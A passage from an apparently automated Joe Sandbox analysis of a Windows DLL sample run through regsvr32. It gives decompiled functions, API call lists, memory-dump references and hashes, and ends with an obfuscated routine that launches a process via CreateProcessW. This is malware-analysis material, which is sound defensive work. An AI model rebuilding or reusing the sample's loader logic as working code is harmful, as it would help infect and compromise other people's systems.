                                                                                                                                                                              • Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B
                                                                                                                                                                            • _printf.LIBCMT ref: 1000896B
                                                                                                                                                                            • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
                                                                                                                                                                            • _malloc.LIBCMT ref: 10008A82
                                                                                                                                                                            • ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual_malloc$NumaShowWindow_printf
                                                                                                                                                                            • String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
                                                                                                                                                                            • API String ID: 1487653210-3670691644
                                                                                                                                                                            • Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                                                                                            • Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
                                                                                                                                                                            • Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
                                                                                                                                                                            • Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                            			E10013A9B() {
                                                                                                                                                                            				struct _CRITICAL_SECTION* _v4;
                                                                                                                                                                            				char _v28;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v44;
                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				intOrPtr __ecx;
                                                                                                                                                                            				signed int __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t39;
                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				long _t44;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				signed int* _t51;
                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                            				long _t68;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                            				signed int _t82;
                                                                                                                                                                            				void* _t86;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				void* _t90;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				void* _t93;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                            				_push(_t69);
                                                                                                                                                                            				_push(_t88);
                                                                                                                                                                            				_t86 = _t72;
                                                                                                                                                                            				_t1 = _t86 + 0x1c; // 0x1005aaa8
                                                                                                                                                                            				_t39 = _t1;
                                                                                                                                                                            				_v4 = _t39;
                                                                                                                                                                            				EnterCriticalSection(_t39);
                                                                                                                                                                            				_t3 = _t86 + 4; // 0x20
                                                                                                                                                                            				_t40 =  *_t3;
                                                                                                                                                                            				_t4 = _t86 + 8; // 0x3
                                                                                                                                                                            				_t82 =  *_t4;
                                                                                                                                                                            				if(_t82 >= _t40) {
                                                                                                                                                                            					L7:
                                                                                                                                                                            					_t82 = 1;
                                                                                                                                                                            					__eflags = _t40 - 1;
                                                                                                                                                                            					if(_t40 <= 1) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t21 = _t40 + 0x20; // 0x40
                                                                                                                                                                            						_t88 = _t21;
                                                                                                                                                                            						_t22 = _t86 + 0x10; // 0xef5680
                                                                                                                                                                            						_t41 =  *_t22;
                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t69 = GlobalHandle(_t41);
                                                                                                                                                                            							GlobalUnlock(_t69);
                                                                                                                                                                            							_t44 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                                                                                            							_t72 = 0x2002;
                                                                                                                                                                            							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t68 = E100134F9(_t72, __eflags, _t88, 8);
                                                                                                                                                                            							_pop(_t72);
                                                                                                                                                                            							_t45 = GlobalAlloc(2, _t68); // executed
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                                            						if(_t45 != 0) {
                                                                                                                                                                            							_t70 = GlobalLock(_t45);
                                                                                                                                                                            							_t25 = _t86 + 4; // 0x20
                                                                                                                                                                            							__eflags = _t88 -  *_t25 << 3;
                                                                                                                                                                            							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                                                                                                                                            							 *(_t86 + 4) = _t88;
                                                                                                                                                                            							 *(_t86 + 0x10) = _t70;
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t23 = _t86 + 0x10; // 0xef5680
                                                                                                                                                                            							_t86 =  *_t23;
                                                                                                                                                                            							__eflags = _t86;
                                                                                                                                                                            							if(_t86 != 0) {
                                                                                                                                                                            								GlobalLock(GlobalHandle(_t86));
                                                                                                                                                                            							}
                                                                                                                                                                            							LeaveCriticalSection(_v4);
                                                                                                                                                                            							_push(_t88);
                                                                                                                                                                            							_t90 = _t93;
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v28 = 0x10057168;
                                                                                                                                                                            							E10017C83( &_v28, 0x1002e258);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(_t90);
                                                                                                                                                                            							_t91 = _t93;
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v36 = 0x10057200;
                                                                                                                                                                            							E10017C83( &_v36, 0x1002e2b8);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(_t91);
                                                                                                                                                                            							_push(_t72);
                                                                                                                                                                            							_v44 = 0x10057298;
                                                                                                                                                                            							E10017C83( &_v44, 0x1002e2fc);
                                                                                                                                                                            							asm("int3");
                                                                                                                                                                            							_push(4);
                                                                                                                                                                            							E10017BC1(E10027DEC, _t69, _t82, _t86);
                                                                                                                                                                            							_t78 = E10013965(0x104);
                                                                                                                                                                            							_v56 = _t78;
                                                                                                                                                                            							_t64 = 0;
                                                                                                                                                                            							_v44 = 0;
                                                                                                                                                                            							if(_t78 != 0) {
                                                                                                                                                                            								_t64 = E1000CF71(_t78);
                                                                                                                                                                            							}
                                                                                                                                                                            							return E10017C60(_t64);
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t18 = _t86 + 0x10; // 0xef5680
                                                                                                                                                                            						_t72 =  *_t18 + 8;
                                                                                                                                                                            						__eflags = _t72;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							__eflags =  *_t72 & 0x00000001;
                                                                                                                                                                            							if(( *_t72 & 0x00000001) == 0) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t82 = _t82 + 1;
                                                                                                                                                                            							_t72 = _t72 + 8;
                                                                                                                                                                            							__eflags = _t82 - _t40;
                                                                                                                                                                            							if(_t82 < _t40) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t82 - _t40;
                                                                                                                                                                            						if(_t82 < _t40) {
                                                                                                                                                                            							goto L20;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t13 = __esi + 0x10; // 0xef5680
                                                                                                                                                                            					__ecx =  *_t13;
                                                                                                                                                                            					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                                                                                                                                            					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                                                                                                                                            						L20:
                                                                                                                                                                            						_t30 = _t86 + 0xc; // 0x3
                                                                                                                                                                            						__eflags = _t82 -  *_t30;
                                                                                                                                                                            						if(_t82 >=  *_t30) {
                                                                                                                                                                            							_t31 = _t82 + 1; // 0x4
                                                                                                                                                                            							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t33 = _t86 + 0x10; // 0xef5680
                                                                                                                                                                            						_t51 =  *_t33 + _t82 * 8;
                                                                                                                                                                            						 *_t51 =  *_t51 | 0x00000001;
                                                                                                                                                                            						__eflags =  *_t51;
                                                                                                                                                                            						_t37 = _t82 + 1; // 0x4
                                                                                                                                                                            						 *(_t86 + 8) = _t37;
                                                                                                                                                                            						LeaveCriticalSection(_v4);
                                                                                                                                                                            						return _t82;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}































                                                                                                                                                                            0x10013a9b
                                                                                                                                                                            0x10013a9c
                                                                                                                                                                            0x10013a9d
                                                                                                                                                                            0x10013a9f
                                                                                                                                                                            0x10013aa1
                                                                                                                                                                            0x10013aa1
                                                                                                                                                                            0x10013aa6
                                                                                                                                                                            0x10013aaa
                                                                                                                                                                            0x10013ab0
                                                                                                                                                                            0x10013ab0
                                                                                                                                                                            0x10013ab3
                                                                                                                                                                            0x10013ab3
                                                                                                                                                                            0x10013ab8
                                                                                                                                                                            0x10013ac7
                                                                                                                                                                            0x10013ac9
                                                                                                                                                                            0x10013aca
                                                                                                                                                                            0x10013acc
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013ae9
                                                                                                                                                                            0x10013aec
                                                                                                                                                                            0x10013aec
                                                                                                                                                                            0x10013aef
                                                                                                                                                                            0x10013af1
                                                                                                                                                                            0x10013b0f
                                                                                                                                                                            0x10013b12
                                                                                                                                                                            0x10013b20
                                                                                                                                                                            0x10013b26
                                                                                                                                                                            0x10013b29
                                                                                                                                                                            0x10013af3
                                                                                                                                                                            0x10013af6
                                                                                                                                                                            0x10013afc
                                                                                                                                                                            0x10013b00
                                                                                                                                                                            0x10013b00
                                                                                                                                                                            0x10013b2f
                                                                                                                                                                            0x10013b31
                                                                                                                                                                            0x10013b5e
                                                                                                                                                                            0x10013b60
                                                                                                                                                                            0x10013b67
                                                                                                                                                                            0x10013b71
                                                                                                                                                                            0x10013b79
                                                                                                                                                                            0x10013b7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b33
                                                                                                                                                                            0x10013b36
                                                                                                                                                                            0x10013b38
                                                                                                                                                                            0x10013b42
                                                                                                                                                                            0x10013b42
                                                                                                                                                                            0x10013b4c
                                                                                                                                                                            0x1000a0a7
                                                                                                                                                                            0x1000a0a8
                                                                                                                                                                            0x1000a0aa
                                                                                                                                                                            0x1000a0b4
                                                                                                                                                                            0x1000a0bb
                                                                                                                                                                            0x1000a0c0
                                                                                                                                                                            0x1000a0c1
                                                                                                                                                                            0x1000a0c2
                                                                                                                                                                            0x1000a0c4
                                                                                                                                                                            0x1000a0ce
                                                                                                                                                                            0x1000a0d5
                                                                                                                                                                            0x1000a0da
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x10013ace
                                                                                                                                                                            0x10013ace
                                                                                                                                                                            0x10013ad1
                                                                                                                                                                            0x10013ad1
                                                                                                                                                                            0x10013ad4
                                                                                                                                                                            0x10013ad4
                                                                                                                                                                            0x10013ad7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ad9
                                                                                                                                                                            0x10013ada
                                                                                                                                                                            0x10013add
                                                                                                                                                                            0x10013adf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013adf
                                                                                                                                                                            0x10013ae1
                                                                                                                                                                            0x10013ae3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ae3
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013aba
                                                                                                                                                                            0x10013abd
                                                                                                                                                                            0x10013ac1
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b7f
                                                                                                                                                                            0x10013b82
                                                                                                                                                                            0x10013b84
                                                                                                                                                                            0x10013b87
                                                                                                                                                                            0x10013b87
                                                                                                                                                                            0x10013b8a
                                                                                                                                                                            0x10013b91
                                                                                                                                                                            0x10013b94
                                                                                                                                                                            0x10013b94
                                                                                                                                                                            0x10013b97
                                                                                                                                                                            0x10013b9a
                                                                                                                                                                            0x10013b9d
                                                                                                                                                                            0x10013baa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013ac1

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
                                                                                                                                                                            • GlobalHandle.KERNEL32(00EF5680), ref: 10013B09
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
                                                                                                                                                                            • GlobalReAlloc.KERNEL32 ref: 10013B29
                                                                                                                                                                            • GlobalHandle.KERNEL32(00EF5680), ref: 10013B3B
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10013B42
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10013B58
                                                                                                                                                                            • _memset.LIBCMT ref: 10013B71
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10013B9D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                                            • Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                                                                                            • Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
                                                                                                                                                                            • Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                                                            			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				intOrPtr* _t10;
                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0xc);
                                                                                                                                                                            				_push(0x1002f780);
                                                                                                                                                                            				_t8 = E1001984C(__ebx, __edi, __esi);
                                                                                                                                                                            				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					L9:
                                                                                                                                                                            					return E10019891(_t8);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1005c984 != 3) {
                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					_push(0);
                                                                                                                                                                            					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
                                                                                                                                                                            					_t31 = _t8;
                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                            						_t10 = E10017D62(_t31);
                                                                                                                                                                            						 *_t10 = E10017D27(GetLastError());
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				}
                                                                                                                                                                            				E1001A549(4);
                                                                                                                                                                            				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                            				_t13 = E1001A5C2(_t23);
                                                                                                                                                                            				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                                            					_push(_t23);
                                                                                                                                                                            					_push(_t13);
                                                                                                                                                                            					E1001A5ED();
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                            				_t8 = E100163D6();
                                                                                                                                                                            				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x10016380
                                                                                                                                                                            0x10016382
                                                                                                                                                                            0x10016387
                                                                                                                                                                            0x1001638c
                                                                                                                                                                            0x10016391
                                                                                                                                                                            0x10016408
                                                                                                                                                                            0x1001640d
                                                                                                                                                                            0x1001640d
                                                                                                                                                                            0x1001639a
                                                                                                                                                                            0x100163df
                                                                                                                                                                            0x100163e0
                                                                                                                                                                            0x100163e0
                                                                                                                                                                            0x100163e8
                                                                                                                                                                            0x100163ee
                                                                                                                                                                            0x100163f0
                                                                                                                                                                            0x100163f2
                                                                                                                                                                            0x10016405
                                                                                                                                                                            0x10016407
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163f0
                                                                                                                                                                            0x1001639e
                                                                                                                                                                            0x100163a4
                                                                                                                                                                            0x100163a9
                                                                                                                                                                            0x100163af
                                                                                                                                                                            0x100163b4
                                                                                                                                                                            0x100163b6
                                                                                                                                                                            0x100163b7
                                                                                                                                                                            0x100163b8
                                                                                                                                                                            0x100163be
                                                                                                                                                                            0x100163bf
                                                                                                                                                                            0x100163c6
                                                                                                                                                                            0x100163cf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163d1
                                                                                                                                                                            0x100163d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100163d1

                                                                                                                                                                            APIs
                                                                                                                                                                            • __lock.LIBCMT ref: 1001639E
                                                                                                                                                                              • Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
                                                                                                                                                                              • Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
                                                                                                                                                                              • Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571
                                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 100163A9
                                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 100163B8
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
                                                                                                                                                                            • GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                                            • Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                                                                                            • Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
                                                                                                                                                                            • Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
                                                                                                                                                                            • Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 225 e82c24-e82d09 call e7fe29 call e6eb52 CreateProcessW
                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                            			E00E82C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				int _t56;
                                                                                                                                                                            				WCHAR* _t60;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a56);
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(_a52);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00E7FE29(_t49);
                                                                                                                                                                            				_v32 = 0x534833;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v8 = 0x70adbe;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                                                                                            				_v8 = _v8 | 0x1d11c356;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1f145645;
                                                                                                                                                                            				_v20 = 0xecea8a;
                                                                                                                                                                            				_v20 = _v20 | 0x5baa72b8;
                                                                                                                                                                            				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                                                                                            				_v16 = 0x76217f;
                                                                                                                                                                            				_v16 = _v16 >> 0x10;
                                                                                                                                                                            				_v16 = _v16 | 0xe98780dc;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                                                                                            				_v12 = 0xeb975;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd8138edb;
                                                                                                                                                                            				_v12 = _v12 | 0x0b4171d5;
                                                                                                                                                                            				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                                                                                            				E00E6EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                                                                                            				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                                                                                            				return _t56;
                                                                                                                                                                            			}













                                                                                                                                                                            0x00e82c2c
                                                                                                                                                                            0x00e82c31
                                                                                                                                                                            0x00e82c33
                                                                                                                                                                            0x00e82c36
                                                                                                                                                                            0x00e82c37
                                                                                                                                                                            0x00e82c3a
                                                                                                                                                                            0x00e82c3d
                                                                                                                                                                            0x00e82c3e
                                                                                                                                                                            0x00e82c41
                                                                                                                                                                            0x00e82c44
                                                                                                                                                                            0x00e82c47
                                                                                                                                                                            0x00e82c4a
                                                                                                                                                                            0x00e82c4b
                                                                                                                                                                            0x00e82c4e
                                                                                                                                                                            0x00e82c4f
                                                                                                                                                                            0x00e82c51
                                                                                                                                                                            0x00e82c52
                                                                                                                                                                            0x00e82c57
                                                                                                                                                                            0x00e82c61
                                                                                                                                                                            0x00e82c64
                                                                                                                                                                            0x00e82c67
                                                                                                                                                                            0x00e82c6e
                                                                                                                                                                            0x00e82c72
                                                                                                                                                                            0x00e82c76
                                                                                                                                                                            0x00e82c7d
                                                                                                                                                                            0x00e82c84
                                                                                                                                                                            0x00e82c8b
                                                                                                                                                                            0x00e82c92
                                                                                                                                                                            0x00e82c99
                                                                                                                                                                            0x00e82ca0
                                                                                                                                                                            0x00e82ca4
                                                                                                                                                                            0x00e82cab
                                                                                                                                                                            0x00e82cb2
                                                                                                                                                                            0x00e82cb9
                                                                                                                                                                            0x00e82cc0
                                                                                                                                                                            0x00e82cc7
                                                                                                                                                                            0x00e82ce8
                                                                                                                                                                            0x00e82d02
                                                                                                                                                                            0x00e82d09

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 00E82D02
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253623838.0000000000E61000.00000020.00000001.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253619899.0000000000E60000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253642695.0000000000E86000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_e60000_regsvr32.jbxd
